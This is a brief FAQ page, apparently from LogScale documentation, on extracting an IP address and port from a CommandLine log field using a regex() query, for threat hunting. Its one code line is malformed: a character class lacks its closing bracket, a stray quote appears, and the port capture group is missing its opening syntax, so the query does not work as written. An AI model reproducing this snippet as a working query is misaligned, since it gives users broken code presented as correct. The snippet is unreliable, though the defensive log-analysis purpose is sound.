FAQ: How do I extract an IP Address from the CommandLine field?

LogScale Documentation Full Library Knowledge Base Release Notes Integrations Training API GraphQL API Contacting Support

Page was created:26 Feb 2024

To gather a more comprehensive data profile and identify possible threats, it may be necessary to extract an IP address from the CommandLine field. To do so, you'll need to use the regex() function:

|regex(?<ip>[0-9]{1,3}\.[0-9{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\:<port>\d{2,5})", field=CommandLine)

Knowledge Base

FAQ: How do I extract an IP Address from the CommandLine field?

Enter search term